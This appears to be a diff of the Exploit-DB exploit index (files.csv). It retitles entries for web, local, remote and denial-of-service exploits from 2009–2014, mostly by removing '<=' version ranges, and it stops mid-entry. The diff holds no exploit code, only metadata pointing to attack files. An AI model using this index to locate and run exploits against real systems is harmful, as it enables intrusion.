33238,platforms/php/webapps/33238.txt,"Joomla! JoomlaFacebook Component SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 @@ -30020,7 +30020,7 @@ id,file,description,date,author,platform,type,port 33268,platforms/asp/webapps/33268.html,"AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,"Sébastien Duquette",asp,webapps,0 33269,platforms/linux/dos/33269.txt,"Dopewars Server 1.5.12 - 'REQUESTJET' Message Remote Denial of Service",2009-10-15,"Doug Prostko",linux,dos,0 33270,platforms/windows/remote/33270.txt,"Microsoft Internet Explorer 5.0.1 - 'deflate' HTTP Content Encoding Remote Code Execution",2009-10-13,Skylined,windows,remote,0 -33271,platforms/windows/dos/33271.py,"VMware Player and Workstation <= 6.5.3 - 'vmware-authd' Remote Denial of Service",2009-10-07,shinnai,windows,dos,0 +33271,platforms/windows/dos/33271.py,"VMware Player and Workstation 6.5.3 - 'vmware-authd' Remote Denial of Service",2009-10-07,shinnai,windows,dos,0 33272,platforms/windows/remote/33272.txt,"Autodesk 3ds Max Application Callbacks Arbitrary Command Execution",2009-10-23,"Sebastian Tello",windows,remote,0 33264,platforms/windows/remote/33264.txt,"Microsoft Internet Explorer 8 - X.509 Certificate Common Name Encoding Multiple Security Bypass Vulnerabilities",2009-08-05,"Dan Kaminsky",windows,remote,0 33273,platforms/windows/remote/33273.scn,"Autodesk Softimage 7.0 Scene TOC File Remote Code Execution",2009-11-23,"Diego Juarez",windows,remote,0 @@ -30030,7 +30030,7 @@ id,file,description,date,author,platform,type,port 33280,platforms/hardware/dos/33280.txt,"Palm WebOS 1.0/1.1 - 'LunaSysMgr' Service Denial of Service",2009-10-13,"Townsend Ladd Harris",hardware,dos,0 33281,platforms/php/webapps/33281.txt,"Achievo 1.x - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",php,webapps,0 33282,platforms/php/webapps/33282.txt,"Dream Poll 3.1 - 'index.php' Cross-Site Scripting and SQL Injection Vulnerabilities",2009-10-13,infosecstuff,php,webapps,0 -33283,platforms/linux/dos/33283.txt,"Adobe Reader <= 9.1.3 and Acrobat COM Objects Memory Corruption Remote Code Execution",2009-10-13,Skylined,linux,dos,0 +33283,platforms/linux/dos/33283.txt,"Adobe Reader 9.1.3 and Acrobat COM Objects Memory Corruption Remote Code Execution",2009-10-13,Skylined,linux,dos,0 33284,platforms/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting and Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps,0 33317,platforms/php/webapps/33317.txt,"AlienVault OSSIM 4.6.1 - Authenticated SQL Injection (Metasploit)",2014-05-12,"Chris Hebert",php,webapps,443 33286,platforms/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Parameter Cross-Site Scripting",2009-10-14,"Michele Orru",java,webapps,0 @@ -30057,11 +30057,11 @@ id,file,description,date,author,platform,type,port 33307,platforms/php/webapps/33307.php,"RunCMS 'forum' Parameter SQL Injection",2009-10-26,Nine:Situations:Group::bookoo,php,webapps,0 33308,platforms/php/webapps/33308.txt,"Sahana 0.6.2 - 'mod' Parameter Local File Disclosure",2009-10-27,"Greg Miernicki",php,webapps,0 33309,platforms/php/webapps/33309.txt,"TFTgallery 0.13 - 'album' Parameter Cross-Site Scripting",2009-10-26,blake,php,webapps,0 -33310,platforms/multiple/remote/33310.nse,"VMware Server <= 2.0.1_ESXi Server <= 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",multiple,remote,0 -33311,platforms/linux/remote/33311.txt,"KDE <= 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0 -33312,platforms/linux/dos/33312.txt,"Mozilla Firefox <= 3.5.3 - Floating Point Conversion Heap Overflow",2009-10-27,"Alin Rad Pop",linux,dos,0 -33313,platforms/linux/remote/33313.txt,"Mozilla Firefox <= 3.5.3 and SeaMonkey <= 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,linux,remote,0 -33314,platforms/linux/dos/33314.html,"Mozilla Firefox <= 3.0.14 - Remote Memory Corruption",2009-10-27,"Carsten Book",linux,dos,0 +33310,platforms/multiple/remote/33310.nse,"VMware Server 2.0.1_ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",multiple,remote,0 +33311,platforms/linux/remote/33311.txt,"KDE 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0 +33312,platforms/linux/dos/33312.txt,"Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow",2009-10-27,"Alin Rad Pop",linux,dos,0 +33313,platforms/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 and SeaMonkey 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,linux,remote,0 +33314,platforms/linux/dos/33314.html,"Mozilla Firefox 3.0.14 - Remote Memory Corruption",2009-10-27,"Carsten Book",linux,dos,0 33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0 33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0 33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 @@ -30091,7 +30091,7 @@ id,file,description,date,author,platform,type,port 33357,platforms/php/webapps/33357.txt,"PHD Help Desk 1.43 atributo.php URL Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 33358,platforms/php/webapps/33358.txt,"PHD Help Desk 1.43 atributo_list.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 33359,platforms/php/webapps/33359.txt,"PHD Help Desk 1.43 caso_insert.php URL Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 -33360,platforms/windows/local/33360.c,"Avast! Antivirus <= 4.8.1356 - 'aswRdr.sys' Driver Local Privilege Escalation",2009-11-16,Evilcry,windows,local,0 +33360,platforms/windows/local/33360.c,"Avast! Antivirus 4.8.1356 - 'aswRdr.sys' Driver Local Privilege Escalation",2009-11-16,Evilcry,windows,local,0 33361,platforms/asp/webapps/33361.txt,"Multiple JiRo's Products 'files/login.asp' Multiple SQL Injection Vulnerabilities",2009-11-17,blackenedsecurity,asp,webapps,0 33362,platforms/php/webapps/33362.txt,"CubeCart 3.0.4/4.3.6 - 'productId' Parameter SQL Injection",2009-11-19,"Sangte Amtham",php,webapps,0 33363,platforms/multiple/remote/33363.txt,"Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",multiple,remote,0 @@ -30106,7 +30106,7 @@ id,file,description,date,author,platform,type,port 33373,platforms/php/webapps/33373.txt,"Subscribe to Comments 2.0 WordPress Plugin - Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,MustLive,php,webapps,0 33374,platforms/php/webapps/33374.txt,"Cacti 0.8.x graph.php Multiple Parameter XSS",2009-11-21,"Moritz Naumann",php,webapps,0 33375,platforms/php/webapps/33375.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 Delete Function Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0 -33376,platforms/php/webapps/33376.pl,"klinza professional CMS 5.0.1 - 'menulast.php' Local File Include",2009-11-24,klinza,php,webapps,0 +33376,platforms/php/webapps/33376.pl,"klinza professional CMS 5.0.1 - 'menulast.php' Local File Inclusion",2009-11-24,klinza,php,webapps,0 33377,platforms/php/webapps/33377.txt,"Joomla! ProofReader 1.0 RC9 Component Cross-Site Scripting",2009-11-16,MustLive,php,webapps,0 33378,platforms/php/webapps/33378.txt,"Joomla! 1.5.x 404 Error Page Cross-Site Scripting",2009-11-23,MustLive,php,webapps,0 33379,platforms/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting",2009-09-02,MustLive,multiple,remote,0 @@ -30117,18 +30117,18 @@ id,file,description,date,author,platform,type,port 33384,platforms/windows/dos/33384.py,"Wireshark 1.10.7 - DoS PoC",2014-05-16,"Osanda Malith",windows,dos,0 33385,platforms/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",php,webapps,0 33386,platforms/multiple/dos/33386.html,"Mozilla Firefox 29.0 - Null Pointer Dereference",2014-05-16,Mr.XHat,multiple,dos,0 -33387,platforms/linux/local/33387.txt,"check_dhcp - Nagios Plugins <= 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0 +33387,platforms/linux/local/33387.txt,"check_dhcp - Nagios Plugins 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0 33388,platforms/linux/remote/33388.f,"Xfig and Transfig 3.2.5 - (.fig) Buffer Overflow",2009-12-03,pedamachephepto,linux,remote,0 33389,platforms/php/webapps/33389.txt,"EGroupware 1.8.006 - Multiple Vulnerabilities",2014-05-16,"High-Tech Bridge SA",php,webapps,80 33390,platforms/php/webapps/33390.txt,"Yoast Google Analytics for WordPress Plugin 3.2.4 - 404 Error Page Cross-Site Scripting",2009-12-04,intern0t,php,webapps,0 33391,platforms/php/webapps/33391.txt,"YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting",2009-12-07,"aBo MoHaMeD",php,webapps,0 33392,platforms/php/webapps/33392.txt,"YOOtheme Warp5 Joomla! Component - 'yt_color' Parameter Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0 33393,platforms/php/webapps/33393.txt,"Joomla! You!Hostit! 1.0.1 Template Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0 -33394,platforms/php/webapps/33394.txt,"Invision Power Board <= 3.0.3 - (.txt) MIME-Type Cross-Site Scripting",2009-12-09,Xacker,php,webapps,0 +33394,platforms/php/webapps/33394.txt,"Invision Power Board 3.0.3 - (.txt) MIME-Type Cross-Site Scripting",2009-12-09,Xacker,php,webapps,0 33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Local Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0 33396,platforms/php/webapps/33396.txt,"Zeeways ZeeJobsite 'basic_search_result.php' Cross-Site Scripting",2009-12-10,bi0,php,webapps,0 -33397,platforms/linux/dos/33397.txt,"MySQL <= 6.0.9 SELECT Statement WHERE Clause Sub-query DoS",2009-11-23,"Shane Bester",linux,dos,0 -33398,platforms/linux/dos/33398.txt,"MySQL <= 6.0.9 - GeomFromWKB() Function First Argument Geometry Value Handling DoS",2009-11-23,"Shane Bester",linux,dos,0 +33397,platforms/linux/dos/33397.txt,"MySQL 6.0.9 SELECT Statement WHERE Clause Sub-query DoS",2009-11-23,"Shane Bester",linux,dos,0 +33398,platforms/linux/dos/33398.txt,"MySQL 6.0.9 - GeomFromWKB() Function First Argument Geometry Value Handling DoS",2009-11-23,"Shane Bester",linux,dos,0 33399,platforms/multiple/remote/33399.txt,"Oracle E-Business Suite 11i Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote,0 33400,platforms/php/webapps/33400.txt,"Ez Cart 'sid' Parameter Cross-Site Scripting",2009-12-14,anti-gov,php,webapps,0 33435,platforms/php/webapps/33435.txt,"ClarkConnect Linux 5.0 - 'proxy.php' Cross-Site Scripting",2009-12-22,"Edgard Chammas",php,webapps,0 @@ -30136,11 +30136,11 @@ id,file,description,date,author,platform,type,port 33437,platforms/php/webapps/33437.txt,"PHP-Calendar 1.1 update10.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0 33438,platforms/multiple/webapps/33438.txt,"webMathematica 3 - 'MSP' Script Cross-Site Scripting",2009-12-23,"Floyd Fuh",multiple,webapps,0 33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 - 'myps.php' Cross-Site Scripting",2009-12-24,"Steven Abbagnaro",php,webapps,0 -33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Include",2009-12-29,F10riX,php,webapps,0 +33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Inclusion",2009-12-29,F10riX,php,webapps,0 33441,platforms/php/webapps/33441.txt,"Joomla! Joomulus Component 2.0 - 'tagcloud.swf' Cross-Site Scripting",2009-12-28,MustLive,php,webapps,0 33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 - admin/config.php tech Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0 33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 - Zap Channel Addition Description Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0 -33444,platforms/php/webapps/33444.txt,"DrBenHur.com DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Include",2009-12-28,Securitylab.ir,php,webapps,0 +33444,platforms/php/webapps/33444.txt,"DrBenHur.com DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Inclusion",2009-12-28,Securitylab.ir,php,webapps,0 33445,platforms/php/webapps/33445.txt,"phpInstantGallery 1.1 - 'admin.php' Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 33447,platforms/php/webapps/33447.php,"FreeWebshop 2.2.9 R2 - Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps,0 @@ -30153,7 +30153,7 @@ id,file,description,date,author,platform,type,port 33454,platforms/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0 33455,platforms/hardware/webapps/33455.txt,"Binatone DT 850W Wireless Router - Multiple CSRF Vulnerabilities",2014-05-21,"Samandeep Singh",hardware,webapps,0 33456,platforms/php/webapps/33456.txt,"Stardevelop Live Help 2.6 - 'SERVER' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-31,indoushka,php,webapps,0 -33457,platforms/php/webapps/33457.txt,"Photokorn 1.542 - Cross-Site Scripting and Remote File Include Vulnerabilities",2009-12-31,indoushka,php,webapps,0 +33457,platforms/php/webapps/33457.txt,"Photokorn 1.542 - Cross-Site Scripting and Remote File Inclusion Vulnerabilities",2009-12-31,indoushka,php,webapps,0 33458,platforms/php/webapps/33458.txt,"Discuz! 1.0 - 'referer' Parameter Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0 33459,platforms/php/webapps/33459.txt,"DieselPay 1.6 - Cross-Site Scripting And Directory Traversal Vulnerabilities",2009-12-31,indoushka,php,webapps,0 33460,platforms/php/webapps/33460.txt,"Reamday Enterprises Magic News Plus 1.0.2 - Cross-Site Scripting",2010-01-01,indoushka,php,webapps,0 @@ -30183,7 +30183,7 @@ id,file,description,date,author,platform,type,port 33486,platforms/php/webapps/33486.txt,"@lex Guestbook 5.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"D3V!L FUCKER",php,webapps,0 33487,platforms/php/webapps/33487.txt,"PhPepperShop 2.5 - 'USER_ARTIKEL_HANDLING_AUFRUF.php' Cross-Site Scripting",2010-01-12,Crux,php,webapps,0 33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 - '$_SERVER['PHP_SELF']' Variable Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0 -33489,platforms/multiple/remote/33489.txt,"Ruby <= 1.9.1 WEBrick Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33489,platforms/multiple/remote/33489.txt,"Ruby 1.9.1 WEBrick Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33493,platforms/multiple/webapps/33493.txt,"Multiple Stored XSS in Mayan-EDms web-based document management OS system",2014-05-24,"Dolev Farhi",multiple,webapps,0 33494,platforms/cgi/webapps/33494.txt,"Web Terra 1.1 - books.cgi Remote Command Execution",2014-05-24,"felipe andrian",cgi,webapps,0 @@ -30191,18 +30191,18 @@ id,file,description,date,author,platform,type,port 33581,platforms/linux/dos/33581.txt,"Hybserv2 - ':help' Command Denial Of Service",2010-01-29,"Julien Cristau",linux,dos,0 33582,platforms/php/webapps/33582.txt,"Joomla! 'com_rsgallery2' 2.0 Component - 'catid' Parameter SQL Injection",2010-01-31,snakespc,php,webapps,0 33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre PJL Daemon Buffer Overflow",2009-12-31,"Francis Provencher",hardware,dos,0 -33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal <= 4.5.1 Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal 4.5.1 Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 -33499,platforms/multiple/remote/33499.txt,"thttpd <= 2.24 HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 -33500,platforms/multiple/remote/33500.txt,"mini_httpd <= 1.18 HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33499,platforms/multiple/remote/33499.txt,"thttpd 2.24 HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33500,platforms/multiple/remote/33500.txt,"mini_httpd 1.18 HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33501,platforms/windows/remote/33501.txt,"Cherokee 0.99.30 Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0 -33502,platforms/windows/remote/33502.txt,"Yaws <= 1.55 Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0 -33503,platforms/multiple/remote/33503.txt,"Orion Application Server <= 2.0.7 Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33502,platforms/windows/remote/33502.txt,"Yaws 1.55 Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0 +33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33504,platforms/multiple/remote/33504.txt,"Boa Webserver 0.94.x Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33505,platforms/php/webapps/33505.txt,"Docmint 1.0/2.1 - 'id' Parameter Cross-Site Scripting",2010-01-12,Red-D3v1L,php,webapps,0 33506,platforms/multiple/dos/33506.py,"Oracle Database - Remote Listener Memory Corruption",2010-01-12,"Dennis Yurichev",multiple,dos,0 33507,platforms/php/webapps/33507.txt,"Simple PHP Blog 0.5.x - 'search.php' Cross-Site Scripting",2010-01-12,Sora,php,webapps,0 -33508,platforms/linux/local/33508.txt,"GNU Bash <= 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0 +33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0 33509,platforms/php/webapps/33509.txt,"Joomla! 'com_tienda' Component - 'categoria' Parameter Cross-Site Scripting",2010-01-13,FL0RiX,php,webapps,0 33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross-Site Scripting",2010-01-13,"ViRuSMaN ",php,webapps,0 33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 - Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0 @@ -30218,19 +30218,19 @@ id,file,description,date,author,platform,type,port 33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Parameter Cross-Site Scripting",2010-01-27,s4r4d0,php,webapps,0 33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server 'utilities/longproc.cfm' Cross-Site Scripting",2010-01-28,"Richard Brain",cfm,webapps,0 33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Local Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0 -33589,platforms/linux/local/33589.c,"Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0 +33589,platforms/linux/local/33589.c,"Linux Kernel 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0 33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0 33524,platforms/linux/dos/33524.txt,"OpenOffice 3.1 - (.csv) Remote Denial of Service",2010-01-14,"Hellcode Research",linux,dos,0 -33525,platforms/php/remote/33525.txt,"Zend Framework <= 1.9.6 - Multiple Input Validation Vulnerabilities / Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0 +33525,platforms/php/remote/33525.txt,"Zend Framework 1.9.6 - Multiple Input Validation Vulnerabilities / Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0 33526,platforms/php/webapps/33526.txt,"Technology for Solutions 1.0 - 'id' Parameter Cross-Site Scripting",2010-01-14,PaL-D3v1L,php,webapps,0 33527,platforms/unix/dos/33527.py,"IBM Tivoli Directory Server 6.2 - 'ibmdiradm' Null Pointer Dereference Denial of Service",2006-04-01,Intevydis,unix,dos,0 33528,platforms/php/webapps/33528.txt,"Xforum 1.4 - 'nbpageliste' Parameter Cross-Site Scripting",2010-01-14,"ViRuSMaN ",php,webapps,0 33529,platforms/php/webapps/33529.txt,"Joomla! 'com_marketplace' Component 1.2 - 'catid' Parameter Cross-Site Scripting",2010-01-14,"ViRuSMaN ",php,webapps,0 -33530,platforms/php/webapps/33530.txt,"LetoDms 1.4.x - 'lang' Parameter Local File Include",2010-01-15,"D. Fabian",php,webapps,0 +33530,platforms/php/webapps/33530.txt,"LetoDms 1.4.x - 'lang' Parameter Local File Inclusion",2010-01-15,"D. Fabian",php,webapps,0 33531,platforms/multiple/dos/33531.py,"Zeus Web Server 4.x - 'SSL2_CLIENT_HELLO' Remote Buffer Overflow",2010-01-15,Intevydis,multiple,dos,0 33532,platforms/multiple/dos/33532.txt,"Oracle Internet Directory 10.1.2.0.2 - 'oidldapd' Remote Memory Corruption",2006-11-10,Intevydis,multiple,dos,0 33533,platforms/windows/dos/33533.html,"Gracenote CDDBControl ActiveX Control 'ViewProfile' Method Heap Buffer Overflow",2010-01-18,karak0rsan,windows,dos,0 -33534,platforms/php/webapps/33534.txt,"TestLink <= 1.8.5 - 'order_by_login_dir' Parameter Cross-Site Scripting",2010-01-18,"Prashant Khandelwal",php,webapps,0 +33534,platforms/php/webapps/33534.txt,"TestLink 1.8.5 - 'order_by_login_dir' Parameter Cross-Site Scripting",2010-01-18,"Prashant Khandelwal",php,webapps,0 33535,platforms/linux/remote/33535.txt,"SystemTap 1.0 - 'stat-server' Remote Arbitrary Command Injection",2010-01-15,"Frank Ch. Eigler",linux,remote,0 33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0 33538,platforms/windows/remote/33538.py,"Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow",2014-05-27,superkojiman,windows,remote,21 @@ -30238,7 +30238,7 @@ id,file,description,date,author,platform,type,port 33637,platforms/php/webapps/33637.txt,"Webee Comments Component 1.1/1.2 for Joomla! index2.php articleId SQL Injection",2009-11-15,"Jeff Channell",php,webapps,0 33638,platforms/php/webapps/33638.txt,"Webee Comments Component 1.1/1.2 for Joomla! Multiple BBCode Tags XSS",2009-11-15,"Jeff Channell",php,webapps,0 33639,platforms/php/webapps/33639.txt,"Joomla! EasyBook 2.0.0rc4 Component Multiple HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0 -33640,platforms/windows/dos/33640.py,"AIMP <= 2.8.3 - (.m3u) Remote Stack Buffer Overflow",2010-02-12,Molotov,windows,dos,0 +33640,platforms/windows/dos/33640.py,"AIMP 2.8.3 - (.m3u) Remote Stack Buffer Overflow",2010-02-12,Molotov,windows,dos,0 33634,platforms/php/webapps/33634.txt,"CommodityRentals CD Rental Software 'index.php' SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 33540,platforms/windows/remote/33540.txt,"SurgeFTP 2.x - 'surgeftpmgr.cgi' Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,windows,remote,0 33541,platforms/php/webapps/33541.txt,"DataLife Engine 8.3 engine/inc/include/init.php selected_language Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 @@ -30250,7 +30250,7 @@ id,file,description,date,author,platform,type,port 33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 - 'misc.php' SQL Injection",2010-01-18,indoushka,php,webapps,0 33548,platforms/php/webapps/33548.txt,"THELIA 1.4.2.1Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,EsSandRe,php,webapps,0 33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - (.slk) NULL Pointer Dereference Remote Denial of Service",2010-01-19,"Hellcode Research",linux,dos,0 -33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents <= 2.0.3 - Authentication Bypass and Multiple SQL Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0 +33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents 2.0.3 - Authentication Bypass and Multiple SQL Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0 33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection",2010-01-20,Ctacok,php,webapps,0 33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 - URI Validation Remote Code Execution",2010-01-21,"Lostmon Lords",windows,remote,0 33553,platforms/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 Digest Authentication Remote Buffer Overflow",2010-01-21,Intevydis,multiple,remote,0 @@ -30269,7 +30269,7 @@ id,file,description,date,author,platform,type,port 33566,platforms/php/webapps/33566.txt,"Joomla! 3D Cloud 'tagcloud.swf' Cross-Site Scripting",2010-01-26,MustLive,php,webapps,0 33567,platforms/hardware/remote/33567.txt,"Cisco Secure Desktop 3.x - 'translation' Cross-Site Scripting",2010-01-26,"Matias Pablo Brutti",hardware,remote,0 33568,platforms/hardware/remote/33568.txt,"Novatel Wireless MiFi 2352 Password Information Disclosure",2010-01-17,"Alejandro Ramos",hardware,remote,0 -33569,platforms/multiple/remote/33569.txt,"HP System Management Homepage <= 3.0.2 - 'servercert' Parameter Cross-Site Scripting",2010-01-27,"Richard Brain",multiple,remote,0 +33569,platforms/multiple/remote/33569.txt,"HP System Management Homepage 3.0.2 - 'servercert' Parameter Cross-Site Scripting",2010-01-27,"Richard Brain",multiple,remote,0 33570,platforms/multiple/remote/33570.txt,"SAP BusinessObjects 12 URI Redirection and Cross-Site Scripting Vulnerabilities",2010-01-27,"Richard Brain",multiple,remote,0 33571,platforms/linux/dos/33571.txt,"PostgreSQL 'bitsubstr' Buffer Overflow",2010-01-27,Intevydis,linux,dos,0 33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",linux,dos,0 @@ -30279,14 +30279,14 @@ id,file,description,date,author,platform,type,port 33595,platforms/php/webapps/33595.txt,"Interspire Knowledge Manager < 5.1.3 - Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps,0 33596,platforms/jsp/webapps/33596.txt,"KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-04,"Nahuel Grisolia",jsp,webapps,0 33597,platforms/php/webapps/33597.txt,"Data 1 Systems UltraBB 1.17 - 'view_post.php' Cross-Site Scripting",2010-02-04,s4r4d0,php,webapps,0 -33598,platforms/linux/remote/33598.rb,"Samba <= 3.4.5 - Symlink Directory Traversal (Metasploit)",2010-02-04,kingcope,linux,remote,0 -33599,platforms/linux/remote/33599.txt,"Samba <= 3.4.5 - Symlink Directory Traversal",2010-02-04,kingcope,linux,remote,0 +33598,platforms/linux/remote/33598.rb,"Samba 3.4.5 - Symlink Directory Traversal (Metasploit)",2010-02-04,kingcope,linux,remote,0 +33599,platforms/linux/remote/33599.txt,"Samba 3.4.5 - Symlink Directory Traversal",2010-02-04,kingcope,linux,remote,0 33600,platforms/multiple/remote/33600.rb,"Oracle 10g - Multiple Remote Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0 33601,platforms/multiple/remote/33601.rb,"Oracle 11g - Multiple Remote Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0 33602,platforms/php/webapps/33602.txt,"evalSMSI 2.1.3 - Multiple Input Validation Vulnerabilities",2010-02-05,ekse,php,webapps,0 33603,platforms/php/webapps/33603.html,"LANDesk Management Gateway 4.x - Multiple Security Vulnerabilities",2010-02-05,"Aureliano Calvo",php,webapps,0 33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - 